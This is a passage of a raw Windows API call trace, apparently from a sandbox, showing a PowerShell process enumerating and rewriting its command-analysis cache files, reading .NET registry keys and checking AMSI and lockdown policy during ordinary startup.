cFileName="PowerShell_AnalysisCacheEntry_ce4a3828-41eb-4c13-a7dc-b508884ff633", cAlternateFileName="PO4BD3~1")) returned 1 [0154.264] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b06ae1, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35b06ae1, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35b06ae1, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x6ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_d6bf188f-46b9-46cd-9cf3-1b817da88189", cAlternateFileName="PO8542~1")) returned 1 [0154.264] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36017b26, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36017b26, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36017b26, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_d8e31a73-07c9-411f-912c-5cdb4abc8b5b", cAlternateFileName="PO4236~1")) returned 1 [0154.264] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3898490f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3898490f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3898490f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xa75, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_d9346ac4-06d5-41a2-93ab-8c2453a0d23c", cAlternateFileName="PO8937~1")) returned 1 [0154.264] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37055a3c, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37055a3c, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37055a3c, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x386, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_d95fa2fb-3af6-4c2c-828c-aceac674e91e", cAlternateFileName="PO014B~1")) returned 1 [0154.264] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d49400, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47d49400, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32820953, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x2b07, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", cAlternateFileName="POWERS~3")) returned 1 [0154.265] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e9a315, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35e9a315, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35e9a315, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x9b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_dd324f19-f302-43d8-aae0-fdc970e9ff7e", cAlternateFileName="PO6346~1")) returned 1 [0154.265] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ba6, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37376ba6, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37376ba6, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x26af, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e135498c-c838-45b1-8285-d5932c2e4afd", cAlternateFileName="POD7F0~1")) returned 1 [0154.265] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36b90fb0, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36b90fb0, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36b90fb0, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1f2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e14fc550-8023-4999-8b48-a7a085211b34", cAlternateFileName="PO38C3~1")) returned 1 [0154.265] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b3433, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x324b3433, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x324b3433, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x2a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e395b6f7-f44f-4d3f-8c27-b4cc9367be1d", cAlternateFileName="POB561~1")) returned 1 [0154.266] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3304ff3f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3304ff3f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x33052602, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_eb331f27-283b-4a22-a23d-6b07ce45adb7", cAlternateFileName="POF760~1")) returned 1 [0154.266] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e8befd, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36e8befd, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36e8befd, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_eca46ed3-360b-44f2-ad29-696e6c294706", cAlternateFileName="POB3CF~1")) returned 1 [0154.266] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x377a2e27, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x377a2e27, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x377a2e27, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1130, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ed385146-800a-40a0-96d6-24706580d8f8", cAlternateFileName="POFA23~1")) returned 1 [0154.267] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36df34de, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36df34de, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36df34de, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xdb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f216542a-99f7-4708-b1a5-0332743e861d", cAlternateFileName="POB0D0~1")) returned 1 [0154.267] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3819ebb9, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3819ebb9, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3819ebb9, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x3d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f8ed291d-1c84-450a-ab5d-cd8fd4c75432", cAlternateFileName="PO8F46~1")) returned 1 [0154.267] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32eaf137, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e", cAlternateFileName="POE0DC~1")) returned 1 [0154.267] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36f70ca5, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x36f70ca5, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x36f70ca5, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x73b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_fadc3aa7-48db-431b-b2ba-6ed906485627", cAlternateFileName="POC5D1~1")) returned 1 [0154.268] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.268] FindClose (in: hFindFile=0x2386d3b4ef0 | out: hFindFile=0x2386d3b4ef0) returned 1 [0154.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e380) returned 1 [0154.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e330) returned 1 [0154.274] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e3d50 [0154.274] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386d6e3d50 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0154.274] CoTaskMemFree (pv=0x2386d6e3d50) [0154.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508dc40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0154.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xafa508ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0154.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e220) returned 1 [0154.274] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xafa508e300 | out: lpFileInformation=0xafa508e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x38c33397, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38c33397, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xc000)) returned 1 [0154.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1e0) returned 1 [0154.275] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xafa508dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0154.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e160) returned 1 [0154.275] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x690 [0154.275] GetFileType (hFile=0x690) returned 0x1 [0154.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e0d0) returned 1 [0154.275] GetFileType (hFile=0x690) returned 0x1 [0154.276] SetEndOfFile (hFile=0x690) returned 1 [0155.044] WriteFile (in: hFile=0x690, lpBuffer=0x2380069f208*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xafa508d9a8, lpOverlapped=0x0 | out: lpBuffer=0x2380069f208*, lpNumberOfBytesWritten=0xafa508d9a8*=0x1000, lpOverlapped=0x0) returned 1 [0155.046] WriteFile (in: hFile=0x690, lpBuffer=0x2380069f208*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xafa508db78, lpOverlapped=0x0 | out: lpBuffer=0x2380069f208*, lpNumberOfBytesWritten=0xafa508db78*=0x1000, lpOverlapped=0x0) returned 1 [0155.047] WriteFile (in: hFile=0x690, lpBuffer=0x2380069f208*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xafa508db28, lpOverlapped=0x0 | out: lpBuffer=0x2380069f208*, lpNumberOfBytesWritten=0xafa508db28*=0x1000, lpOverlapped=0x0) returned 1 [0155.047] WriteFile (in: hFile=0x690, lpBuffer=0x2380069f208*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xafa508d9a8, lpOverlapped=0x0 | out: lpBuffer=0x2380069f208*, lpNumberOfBytesWritten=0xafa508d9a8*=0x1000, lpOverlapped=0x0) returned 1 [0155.048] WriteFile (in: hFile=0x690, lpBuffer=0x2380069f208*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0xafa508e268, lpOverlapped=0x0 | out: lpBuffer=0x2380069f208*, lpNumberOfBytesWritten=0xafa508e268*=0xced, lpOverlapped=0x0) returned 1 [0155.058] CloseHandle (hObject=0x690) returned 1 [0155.061] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508e070, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0155.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e500) returned 1 [0155.064] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x238006ab4e8 | out: lpFileInformation=0x238006ab4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0155.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4c0) returned 1 [0155.066] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xafa508dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0155.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e3f0) returned 1 [0155.066] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xafa508e4d0 | out: lpFileInformation=0xafa508e4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x38c33397, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38c33397, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xc000)) returned 1 [0155.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e3b0) returned 1 [0155.066] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0xafa508de50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0155.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e330) returned 1 [0155.066] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x690 [0155.067] GetFileType (hFile=0x690) returned 0x1 [0155.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e2a0) returned 1 [0155.067] GetFileType (hFile=0x690) returned 0x1 [0155.107] ReadFile (in: hFile=0x690, lpBuffer=0x238006af730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e198, lpOverlapped=0x0 | out: lpBuffer=0x238006af730*, lpNumberOfBytesRead=0xafa508e198*=0x1000, lpOverlapped=0x0) returned 1 [0156.393] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508c9e8 | out: phkResult=0xafa508c9e8*=0x0) returned 0x2 [0156.397] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508c9e8 | out: phkResult=0xafa508c9e8*=0x0) returned 0x2 [0156.512] ReadFile (in: hFile=0x690, lpBuffer=0x2380032e0d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508de68, lpOverlapped=0x0 | out: lpBuffer=0x2380032e0d0*, lpNumberOfBytesRead=0xafa508de68*=0x1000, lpOverlapped=0x0) returned 1 [0156.514] ReadFile (in: hFile=0x690, lpBuffer=0x238003421bd, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0xafa508daf8, lpOverlapped=0x0 | out: lpBuffer=0x238003421bd*, lpNumberOfBytesRead=0xafa508daf8*=0x5, lpOverlapped=0x0) returned 1 [0156.514] ReadFile (in: hFile=0x690, lpBuffer=0x2380032e0d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508dac8, lpOverlapped=0x0 | out: lpBuffer=0x2380032e0d0*, lpNumberOfBytesRead=0xafa508dac8*=0xb02, lpOverlapped=0x0) returned 1 [0156.516] ReadFile (in: hFile=0x690, lpBuffer=0x2380032e0d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e168, lpOverlapped=0x0 | out: lpBuffer=0x2380032e0d0*, lpNumberOfBytesRead=0xafa508e168*=0x0, lpOverlapped=0x0) returned 1 [0156.516] CloseHandle (hObject=0x690) returned 1 [0156.519] ReleaseMutex (hMutex=0x59c) returned 1 [0156.524] CoCreateGuid (in: pguid=0xafa508e5c8 | out: pguid=0xafa508e5c8*(Data1=0xb9d1a4b9, Data2=0x3731, Data3=0x4abc, Data4=([0]=0xad, [1]=0xa2, [2]=0x83, [3]=0x45, [4]=0x72, [5]=0x27, [6]=0x6b, [7]=0xd1))) returned 0x0 [0156.542] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x690 [0156.542] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6ac [0156.543] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a0 [0156.543] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8 [0156.543] SetEvent (hEvent=0x6b8) returned 1 [0156.543] SetEvent (hEvent=0x690) returned 1 [0156.543] SetEvent (hEvent=0x6ac) returned 1 [0156.543] SetEvent (hEvent=0x6a0) returned 1 [0156.544] AmsiCloseSession () returned 0x7ff865db8068 [0156.544] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694 [0156.545] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.659] EtwEventActivityIdControl () returned 0x0 [0156.659] EtwEventActivityIdControl () returned 0x0 [0156.659] EtwEventActivityIdControl () returned 0x0 [0158.407] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0158.410] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508d870, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dcc0) returned 1 [0158.410] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508dda0 | out: lpFileInformation=0xafa508dda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0158.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dc80) returned 1 [0158.411] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0158.414] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.414] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e6390 [0158.414] GetSystemDirectoryW (in: lpBuffer=0x2386d6e6390, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.414] CoTaskMemFree (pv=0x2386d6e6390) [0158.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0158.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508d6f0) returned 1 [0158.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508d7d0 | out: lpFileInformation=0xafa508d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0158.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508d6b0) returned 1 [0158.415] WldpGetLockdownPolicy () returned 0x0 [0158.415] GetSystemInfo (in: lpSystemInfo=0xafa508d830 | out: lpSystemInfo=0xafa508d830*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, 